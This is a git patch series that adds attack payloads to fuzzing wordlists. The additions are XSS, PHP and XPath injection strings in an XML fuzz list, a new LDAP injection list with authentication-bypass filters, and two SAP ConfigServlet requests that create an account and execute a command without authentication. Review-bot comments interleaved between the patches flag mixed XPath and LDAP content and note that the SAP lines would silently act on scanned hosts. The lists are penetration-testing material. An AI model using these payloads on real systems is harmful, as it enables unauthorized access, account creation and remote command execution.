From 3570ebcd2fbcb5545da8799dbc8b60390dc06831 Mon Sep 17 00:00:00 2001
From: Jay Turla
Date: Wed, 19 Nov 2014 15:21:10 +0800
Subject: [PATCH 1/4] Update XML_FUZZ

Adding some payloads

---
 Fuzzing/XML_FUZZ | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/Fuzzing/XML_FUZZ b/Fuzzing/XML_FUZZ
index c2223ac..1aaf47f 100644
--- a/Fuzzing/XML_FUZZ
+++ b/Fuzzing/XML_FUZZ
@@ -11,6 +11,11 @@ ]> ]> +"]]>" +"cript:alert('XSS')"">" +"" +"XSS" +','')); phpinfo(); exit;/* ## Element and Attrib Values
@@ -48,3 +53,5 @@ false
 {{Tnn96}}
 {= Tnn96}
 {{= Tnn96}}
+count(/child::node())
+x' or name()='username' or 'x'='y

From 39802ff82f5d4a8d2124e3fbf0892cb238a30da1 Mon Sep 17 00:00:00 2001
From: Jay Turla
Date: Wed, 19 Nov 2014 15:27:31 +0800
Subject: [PATCH 2/4] Update XML_FUZZ

---
 Fuzzing/XML_FUZZ | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/Fuzzing/XML_FUZZ b/Fuzzing/XML_FUZZ
index 1aaf47f..411cf60 100644
--- a/Fuzzing/XML_FUZZ
+++ b/Fuzzing/XML_FUZZ
@@ -53,5 +53,13 @@ false
 {{Tnn96}}
 {= Tnn96}
 {{= Tnn96}}
+' or '1'='1
+' or ''='
+x' or 1=1 or 'x'='y
+/
+//
+//*
+*/*
+@*
 count(/child::node())
 x' or name()='username' or 'x'='y

From 726901c9310eac410c19674c02f14ee24e73ceeb Mon Sep 17 00:00:00 2001
From: Jay Turla
Date: Wed, 19 Nov 2014 15:31:08 +0800
Subject: [PATCH 3/4] Create LDAP_FUZZ.txt

---
 Fuzzing/LDAP_FUZZ.txt | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 Fuzzing/LDAP_FUZZ.txt

diff --git a/Fuzzing/LDAP_FUZZ.txt b/Fuzzing/LDAP_FUZZ.txt
new file mode 100644
index 0000000..d84ea8c
--- /dev/null
+++ b/Fuzzing/LDAP_FUZZ.txt
@@ -0,0 +1,26 @@
+!
+%21
+%26
+%28
+%29
+%2A%28%7C%28mail%3D%2A%29%29
+%2A%28%7C%28objectclass%3D%2A%29%29
+%2A%7C
+%7C
+&
+(
+)
+*(|(mail=*))
+*(|(objectclass=*))
+*/*
+*|
+/
+//
+//*
+@*
+x' or name()='username' or 'x'='y
+|
+*()|&'
+admin*
+admin*)((|userpassword=*)
+*)(uid=*))(|(uid=*

From d1bdc1d65a2b7580b140ceb0780fc61da8d6d293 Mon Sep 17 00:00:00 2001
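Review bot: Six of the entries in the new Fuzzing/LDAP_FUZZ.txt are XPath expressions rather than LDAP filter syntax — `/`, `//`, `//*`, `*/*`, `@*` and `x' or name()='username' or 'x'='y` — and PATCH 1/4 and PATCH 2/4 of this same series add exactly those strings to Fuzzing/XML_FUZZ, so the two lists now carry duplicated content under different names. Either keep the XPath strings only in XML_FUZZ, or separate them from the LDAP filter probes (`*(|(mail=*))`, `admin*)((|userpassword=*)`, …) with a `## ` section header the way XML_FUZZ already does (`## Element and Attrib Values`), so each list stays usable for the target its filename names and the copies do not drift apart. The new file also has no header line stating what it covers, which is what makes the mixed content easy to miss.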
From: JT
Date: Sun, 14 Dec 2014 18:37:07 +0800
Subject: [PATCH 4/4] Update sap.txt

adding SAP ConfigServlet Remote Unauthenticated Payload Execution

---
 vulns/sap.txt | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/vulns/sap.txt b/vulns/sap.txt
index b46b186..1d14630 100755
--- a/vulns/sap.txt
+++ b/vulns/sap.txt
@@ -92,6 +92,8 @@ caf
 ccsui
 com~tc~lm~webadmin~httpprovider~web
 ctc
+ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
+ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
 dispatcher
 dswsbobje
 dtr_lite
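Review bot: The two added lines in vulns/sap.txt are complete request strings with state-changing actions (`CREATEUSER` with a fixed credential, `EXECUTE_CMD` with `CMDLINE=ipconfig%20/all`), while every other entry in the hunk (`ccsui`, `ctc`, `dispatcher`, …) is a bare path name used for presence discovery. Any consumer that feeds this list into an existence scan would now attempt to create an account or run a command on every host it touches without the operator having chosen that, so these entries belong in a separately named file or under a section header that states they are active checks rather than paths. The commit message calls them "Payload Execution", but nothing inside the file marks the two lines as different from the surrounding names.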